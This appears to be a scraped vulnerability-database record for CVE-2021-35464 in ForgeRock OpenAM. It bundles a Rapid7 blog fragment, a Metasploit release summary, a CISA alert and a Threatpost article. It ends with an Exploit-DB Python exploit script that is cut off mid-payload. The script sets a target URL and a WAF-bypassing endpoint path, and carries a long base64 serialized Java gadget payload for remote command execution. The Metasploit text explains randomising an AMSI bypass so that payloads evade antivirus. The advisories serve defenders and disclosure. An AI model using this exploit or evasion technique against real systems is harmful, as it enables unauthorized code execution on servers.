endpoint along with other HTTP paths that used the vulnerable Jato framework.\n\nAs of Tuesday, June 29, 2021, Rapid7 Labs has been able to identify just over 1,000 internet-facing systems that appear to be using ForgeRock\u2019s OpenAM solution.\n\nAll organizations running ForgeRock OpenAM 7.0.x or lower (or are using the latest release of the Open Identify Platform\u2019s fork of OpenAM) are urged to prioritize upgrading or applying the mitigations within an accelerated patch window if possible, and at the very least within the 30-day window if you are following the typical 30-60-90 day patch criticality cadence.\u200c\u200c Furthermore, organizations that are monitoring web application logs and OpenAM server logs should look for anomalous `GET` or `POST` request volume to HTTP path endpoints that include `/ccversion` in them.\n\nFor individual vulnerability analysis, [see AttackerKB](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-openam-cve-2021-35464?referrer=blog#rapid7-analysis>).\n\nThis blog post will be updated with new information as warranted.\n\n_Header image photo by [Hannah Gibbs](<https://unsplash.com/@hannahmgibbs?utmsource=unsplash&utmmedium=referral&utmcontent=creditCopyText>) on [Unsplash](<https://unsplash.com/s/photos/forge?utmsource=unsplash&utmmedium=referral&utmcontent=creditCopyText>)_", "cvss3": {}, "published": "2021-06-30T15:26:49", "type": "rapid7blog", "title": "ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464): What You Need To Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-06-30T15:26:49", "id": "RAPID7BLOG:5223F0ED8D616DB4EE860CF6B7770388", "href": "https://blog.rapid7.com/2021/06/30/forgerock-openam-pre-auth-remote-code-execution-vulnerability-what-you-need-to-know/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-28T14:56:11", "description": "## Eternal Blue improvements\n\n\n\nPrior to this release Metasploit offered two separate exploit modules for targeting MS17-010, dubbed Eternal Blue. The Ruby module previously only supported Windows 7, and a separate `ms17_010_eternalblue_win8` Python module would target Windows 8 and above.\n\nNow Metasploit provides a single Ruby exploit module `exploits/windows/smb/ms17_010_eternalblue.rb` which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change removes the need for users to have Python and impacket installed on their host machine, and the automatic targeting functionality will now also make this module easier to run and exploit targets.\n\n## AmSi 0BfuSc@t!on\n\nThe Anti-Malware Scan Interface integrated into Windows poses a lot of challenges for offensive security testing. While bypasses exist and one such [technique is integrated](<https://github.com/rapid7/rex-powershell/blob/335b0eb2e32625d12fd58a1b1a569b0068ddb435/lib/rex/powershell/psh_methods.rb#L93>) directly into Metasploit, the stub itself is identified as malicious. A chicken and egg problem exists due to the stub being incapable of being executed to bypass AMSI and permit the payload from executing. To address this, Metasploit now randomizes the AMSI bypass stub itself. The randomization both obfuscates literal string values that are known qualifiers for AMSI such as `amsiInitFailed` as well as shuffles the placement of powershell expressions. With these improvements in place, Powershell payloads are now much more likely to be successfully executed. While the bypass stub is now prepended by default for all exploit modules, it can be explicitly disabled by setting `Powershell::prepend_protections_bypass` to false.\n\n## VMware vCenter Server RCE\n\nOur very own Will Vu has added a new exploit module targeting VMware vCenter Server CVE-2021-21985. This module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. This module has been tested against VMware vCenter Server 6.7 Update 3m (Linux appliance). For testing in your own lab environment, full details are in the [module documentation](<https://github.com/rapid7/metasploit-framework/blob/843a7242f4e9a5a868ff26d09428763b643933cc/documentation/modules/exploit/linux/http/vmware_vcenter_vsan_health_rce.md>).\n\n## New module content (4)\n\n * [VMware vCenter Server Virtual SAN Health Check Plugin RCE](<https://github.com/rapid7/metasploit-framework/pull/15383>) by wvu and Ricter Z, which exploits [CVE-2021-21985](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog>) \\- A new exploit module for VMware vCenter Server CVE-2021-21985 which exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user.\n * [Polkit D-Bus Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/15368>) by Kevin Backhouse, Spencer McIntyre, and jheysel-r7, which exploits [CVE-2021-3560](<https://attackerkb.com/topics/Jcs7hHRUxg/cve-2021-3560?referrer=blog>) \\- A new module has been added which exploits CVE-2021-3560, an authentication bypass and local privilege elevation vulnerability in polkit, a toolkit for defining and handling authorizations which is installed by default on many Linux systems. Successful exploitation results in the creation of a new user with `root` permissions, which can then be used to gain a shell as `root`. Note that exploitation requires that users have a non-interactive session on some systems so users may need to gain a SSH session first before exploiting this vulnerability.\n * [ForgeRock / OpenAM Jato Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/15386>) by Michael Stepankin, Spencer McIntyre, bwatters-r7, and jheysel-r7, which exploits [CVE-2021-35464](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464?referrer=blog>) \\- A new module has been added which exploits CVE-2021-35464, a pre-authentication Java deserialization vulnerability \nin OpenAM and ForgeRock AM. Succcessful exploitation allows for remote code execution as the user running the OpenAM service.\n * [Windows Process Memory Dump](<https://github.com/rapid7/metasploit-framework/pull/15154>) by smashery - This adds a new post module that dumps the memory of any process on the target. This module is able to perform a full or a standard dump. It also downloads the file into the local loot database and delete the temporary file on the target.\n\n## Enhancements and features\n\n * [#15217](<https://github.com/rapid7/metasploit-framework/pull/15217>) from [agalway-r7](<https://github.com/agalway-r7>) \\- Removes the Python module `ms17_010_eternalblue_win8.py` and consolidates the functionality into `exploits/windows/smb/ms17_010_eternalblue.rb` \\- which as a result can now target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change now removes the need to have Python installed on the host machine, and the automatic targeting functionality will now make this module easier to run.\n * [#15254](<https://github.com/rapid7/metasploit-framework/pull/15254>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This updates the AMSI bypass used by modules executing Powershell code to be randomized making it more difficult to be detected using static signatures.\n\n## Bugs fixed\n\n * [#15362](<https://github.com/rapid7/metasploit-framework/pull/15362>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fixes a regression issue with `post/multi/manage/shell_to_meterpreter`, and other interactions with command shell based sessions\n * [#15420](<https://github.com/rapid7/metasploit-framework/pull/15420>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an regression issue were `auxiliary/scanner/ssh/eaton_xpert_backdoor` failed to load correctly\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.52...6.0.53](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-07-08T16%3A19%3A37%2B01%3A00..2021-07-15T10%3A18%3A50%2B01%3A00%22>)\n * [Full diff 6.0.52...6.0.53](<https://github.com/rapid7/metasploit-framework/compare/6.0.52...6.0.53>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-16T19:47:06", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985", "CVE-2021-35464", "CVE-2021-3560"], "modified": "2021-07-16T19:47:06", "id": "RAPID7BLOG:8495B2B62A16EF7A1217077330A344B3", "href": "https://blog.rapid7.com/2021/07/16/metasploit-wrap-up-121/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-08-03T18:11:09", "description": "Malicious cyber actors are actively exploiting a pre-authorization remote code execution vulnerability (CVE-2021-35464) in ForgeRock Access Management\u2014a commercial open access management solution that is based on OpenAM, an open-source access management solution. An attacker exploiting this vulnerability can execute commands in the context of the current user. The vulnerability affects Access Management versions 6.0.0.x, 6.5.0.x, 6.5.1, 6.5.2.x and 6.5.3 and older unsupported versions.\n\nCISA recommends Access Management users:\n\n * Review the [ForgeRock Security Advisory](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) and the [Australian Cyber Security Centre Alert](<https://www.cyber.gov.au/acsc/view-all-content/alerts/forgerock-open-am-critical-vulnerability>);\n * Check for vulnerable instances of the Access Management software (see [ForgeRock\u2019s Technical Impact Assessment](<https://backstage.forgerock.com/cloud-storage-ws/api/v1/cloudstorage/getfile/oEQfKvz8SWSCaq8F2bfwhw>)); and\n * Prioritize deploying an update to Access Management version 7 or apply the workaround urgently.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/07/12/critical-forgerock-access-management-vulnerability>); we'd welcome your feedback.\n", "cvss3": {}, "published": "2021-07-12T00:00:00", "type": "cisa", "title": "Critical ForgeRock Access Management Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-12T00:00:00", "id": "CISA:3A09D1755051967FC65BD11A814E9167", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/12/critical-forgerock-access-management-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-07-13T12:53:34", "description": "Attackers are actively exploiting a critical, pre-authorization remote-code execution (RCE) vulnerability in the popular Access Management platform from digital identity management firm ForgeRock.\n\nAccess Management, a commercial access-management platform, is based on the [OpenAM](<https://github.com/OpenIdentityPlatform/OpenAM>) open-source access-management platform for web applications. The platform front-ends web apps and remote-access setups in many enterprises.\n\nOn Monday morning, the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/12/critical-forgerock-access-management-vulnerability>) that the vulnerability could enable attackers to execute commands in the context of the current user. The flaw can be found in Access Management versions below 7.0 running on Java 8. That means 6.0.0.x, 6.5.0.x, 6.5.1, 6.5.2.x and 6.5.3, as well as older, unsupported versions are all sitting ducks.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAlso on Monday, ForgeRock said in an updated [security advisory](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) that the flaw doesn\u2019t affect Access Management 7 and above. It only impacts a subset of ForgeRock customers who are using older versions of the company\u2019s Access Management product.\n\nAn exploit for the critical vulnerability at the heart of the matter \u2013 [CVE-2021-35464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464>) \u2013 was [first reported](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>) by Michael Stepankin, a researcher for the cybersecurity firm PortSwigger, on June 29. In his report, Stepankin explained that he created a new [Ysoserial deserialization gadget chain](<https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Click1.java>) specifically for the exploit.\n\nAs [GitHub details](<https://github.com/frohoff/ysoserial>), Ysoserial is a proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. Serialization is a mechanism of converting the state of an object into a byte stream. Deserialization, in turn, is the reverse process: That\u2019s the mechanism whereby the byte stream is used to recreate the actual Java object in memory, used to persist the object.\n\nWithin hours of Stepankin\u2019s post on June 29, ForgeRock released a workaround and advisory to its customers to protect them from the vulnerability. On July 9, the company updated its advisory with a permanent fix.\n\n## What a Dinky PoC\n\nIn his post, Stepankin summed up the flaw as an RCE made possible \u201cthanks to unsafe Java deserialization in the Jato framework used by OpenAM.\u201d The proof of concept (PoC) requires this single GET/POST request for code execution:\n\n> GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object>\n\nHe said that an attacker who crafts such a request can send it to an exposed, remote endpoint in order to pull off RCE.\n\nThe researcher discovered the vulnerability while looking into [OAuth vulnerabilities](<https://threatpost.com/microsoft-warns-oauth-attacks-cloud-app/157331/>). OAuth is an open standard for access delegation, commonly used as a way for people to sign into services without entering a password, by using signed-in status on another, trusted service or website. Examples include the \u201cSign in with Google\u201d or \u201cSign in with Facebook\u201d that many websites use in lieu of asking visitors to create a new account. These \u201cSign in\u201d or \u201cLog in\u201d prompts are called consent prompts.\n\nA year ago, [Microsoft warned](<https://threatpost.com/microsoft-warns-oauth-attacks-cloud-app/157331/>) that during the pandemic, against the backdrop of widespread remote working and the increased use of collaboration apps, attackers were ramping up application-based attacks that exploit OAuth 2.0.\n\nWith the help of a few scripts, Stepankin discovered all servers that respond to the \u201c/well-known/openid-configuration\u201d URI and checked out their configuration. He decided to focus on \u201ctruly impactful\u201d vulnerabilities: Hence, he zeroed in on systems that are either open-source or available to download and decompile. \u201cForgeRock OpenAm was one such system that I found in the bug bounty scope,\u201d he wrote. \u201cIt appeared to me as a monstrous Java Enterprise application with a huge attack surface, so I decided to take a deeper look into it.\u201d\n\nHis takeaways from tackling the Java monster:\n\n * Source code analysis and local testing are essential for finding issues like this one.\n * URLDNS and JRMPClient gadget chains are the most universal for testing deserialization in Java.\n * Even in solutions designed for authentication, you can find a big attack surface available without any auth.\n * Automatic source code analysis tools are not sufficient if they don\u2019t cover dependencies.\n * Java deserialization rocks.\n\n## Patch Available\n\nOn Saturday, ForgeRock [updated its advisory](<https://www.forgerock.com/blog/patch-fixing-am-vulnerability-now-available-forgerock-am-6x>) to advise users to take immediate action to either implement one of the workarounds or the patch as soon as possible.\n\nForgeRock urged users to apply a workaround, to be applied \u201cimmediately\u201d to secure deployments, noting that the workarounds are suitable for all versions, including older, unsupported ones.\n\nStepankin noted that the vulnerability was patched in ForgeRock AM version 7.0 \u201cby entirely removing the \u2018/ccvesion\u2019 endpoint, along with other legacy endpoints that use Jato.\u201d\n\nHe mentioned this big \u201cbut\u201d: \u201cJato framework has not been updated for many years, so all other products that rely on it may still be affected.\u201d\n\nThe researcher also noted that the flaw doesn\u2019t affect instances running with Java version 9 or newer, \u201csince Jato requires classes that have been removed in Java 9. It\u2019s [one of the reasons](<https://backstage.forgerock.com/knowledge/kb/article/a53786484>) why ForgeRock AM versions prior 7, such as 6.5, are still running on Java 8,\u201d he continued.\n\n## Patch or Workaround\n\nUsers who can\u2019t patch can apply one of two [workarounds](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) that ForgeRock provided in its advisory.\n\nCISA recommends these steps for Access Management users to secure their platforms against the active, ongoing exploits:\n\n * Review the [ForgeRock Security Advisory](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) and the [Australian Cyber Security Centre Alert](<https://www.cyber.gov.au/acsc/view-all-content/alerts/forgerock-open-am-critical-vulnerability>);\n * Check for vulnerable instances of the Access Management software (see [ForgeRock\u2019s Technical Impact Assessment](<https://backstage.forgerock.com/cloud-storage-ws/api/v1/cloudstorage/getfile/oEQfKvz8SWSCaq8F2bfwhw>)); and\n * Prioritize deploying an update to Access Management version 7 or apply the workaround urgently.\n\n## Tasty Targets\n\nMarcus Hartwig, manager of security analytics at cybersecurity firm Vectra, told Threatpost on Monday that identity and access management (IAM) platforms like OpenAM are \u201calways ripe targets for attackers since they allow attackers to access multiple downstream applications federated with the solution.\u201d\n\nAs well, Hartwig said in an email, \u201ceven if the compromised account lacks access to a specific application, many IAM solutions support creating new downstream accounts on applications through protocols like SCIM, which further allows attackers to progress their attacks.\u201d\n\nHe said that it\u2019s \u201cparamount\u201d for organizations that leverage IAM solutions for SSO into downstream applications to \u201cmonitor account behavior in their environs to detect attacks that circumvent the preventative security that Access Management solutions focus on.\u201d\n\n071221 16:19 UPDATE: Corrected the article to specify that there\u2019s a patch available. We regret the error.\n\n071221 20:21 UPDATE: Corrected inaccurate timeline for patch release.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-12T18:01:46", "type": "threatpost", "title": "Critical RCE Vulnerability in ForgeRock OpenAM Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-12T18:01:46", "id": "THREATPOST:50745DFE98A2EA07C8BE5D2F2CFA940F", "href": "https://threatpost.com/critical-vulnerability-rce-forgerock-openam/167679/", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2021-07-16T08:46:55", "description": "", "cvss3": {}, "published": "2021-07-16T00:00:00", "type": "exploitdb", "title": "ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-16T00:00:00", "id": "EDB-ID:50131", "href": "https://www.exploit-db.com/exploits/50131", "sourceData": "# Exploit Title: ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)\r\n# Date: 2021-07-14\r\n# Exploit Author: Photubias \u2013 tijl[dot]deneut[at]Howest[dot]be for www.ic4.be\r\n# Vendor Advisory: [1] https://backstage.forgerock.com/knowledge/kb/article/a47894244\r\n# Vendor Homepage: https://github.com/OpenIdentityPlatform/OpenAM/\r\n# Version: [1] OpenAM 14.6.3\r\n# [2] Forgerock 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and is fixed as of version AM 7 released on June 29, 2021\r\n# Tested on: OpenAM 14.6.3 and Tomcat/8.5.68 with JDK-8u292 on Debian 10\r\n# CVE: CVE-2021-35464\r\n\r\n#!/usr/bin/env python3\r\n\r\n''' \r\n\tCopyright 2021 Photubias(c)\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2021-35464.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n This is a native implementation without requirements, written in Python 3.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n \r\n Rewritten from and full credits to @Y4er_ChaBug:\r\n https://github.com/Y4er/openam-CVE-2021-35464\r\n and of course the discoverer @artsploit:\r\n https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464\r\n Created using https://github.com/frohoff/ysoserial\r\n'''\r\n\r\nimport urllib.request, urllib.parse, ssl, sys, optparse\r\n\r\n## Static vars; change at will, but recommend leaving as is\r\nsURL = 'http://192.168.0.100:7080/openam'\r\nsEndpoint = 'ccversion/Version'\r\nsEndpoint = 'oauth2/..;/ccversion/Version' ## This bypasses potential WAFs\r\niTimeout = 5\r\nstrSerializedPayload = b'AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAABRfyv66vgAAADQBBgoARgCKCgCLAIwKAIsAjQoAHQCOCAB7CgAbAI8KAJAAkQoAkACSBwB8CgCLAJMIAJQKACAAlQgAlggAlwcAmAgAmQgAWQcAmgoAGwCbCACcCABxBwCdCwAWAJ4LABYAnwgAaAgAoAcAoQoAGwCiBwCjCgCkAKUIAKYHAKcIAKgKACAAqQgAqgkAJQCrBwCsCgAlAK0IAK4KAK8AsAoAIACxCACyCACzCAC0CAC1CAC2BwC3BwC4CgAwALkKADAAugoAuwC8CgAvAL0IAL4KAC8AvwoALwDACgAgAMEIAMIKABsAwwoAGwDECADFBwBlCgAbAMYIAMcHAMgIAMkIAMoHAMsKAEMAzAcAzQcAzgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy9Ub21jYXRFY2hvSW5qZWN0OwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwDPAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAAWUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAA2NscwEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAEdmFyNQEAIUxqYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uOwEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAGcmVzdWx0AQACW0IBAAlwcm9jZXNzb3IBABJMamF2YS9sYW5nL09iamVjdDsBAANyZXEBAARyZXNwAQABagEAAUkBAAF0AQASTGphdmEvbGFuZy9UaHJlYWQ7AQADc3RyAQASTGphdmEvbGFuZy9TdHJpbmc7AQADb2JqAQAKcHJvY2Vzc29ycwEAEExqYXZhL3V0aWwvTGlzdDsBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAFpAQAEZmxhZwEAAVoBAAVncm91cAEAF0xqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQABZgEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAd0aHJlYWRzAQATW0xqYXZhL2xhbmcvVGhyZWFkOwEADVN0YWNrTWFwVGFibGUHANAHANEHANIHAKcHAKMHAJoHAJ0HAGMHAMgHAMsBAApTb3VyY2VGaWxlAQAVVG9tY2F0RWNob0luamVjdC5qYXZhDABHAEgHANIMANMA1AwA1QDWDADXANgMANkA2gcA0QwA2wDcDADdAN4MAN8A4AEABGV4ZWMMAOEA4gEABGh0dHABAAZ0YXJnZXQBABJqYXZhL2xhbmcvUnVubmFibGUBAAZ0aGlzJDABAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24MAOMA2AEABmdsb2JhbAEADmphdmEvdXRpbC9MaXN0DADkAOUMAN0A5gEAC2dldFJlc3BvbnNlAQAPamF2YS9sYW5nL0NsYXNzDADnAOgBABBqYXZhL2xhbmcvT2JqZWN0BwDpDADqAOsBAAlnZXRIZWFkZXIBABBqYXZhL2xhbmcvU3RyaW5nAQADY21kDADsAO0BAAlzZXRTdGF0dXMMAO4AXwEAEWphdmEvbGFuZy9JbnRlZ2VyDABHAO8BAAdvcy5uYW1lBwDwDAD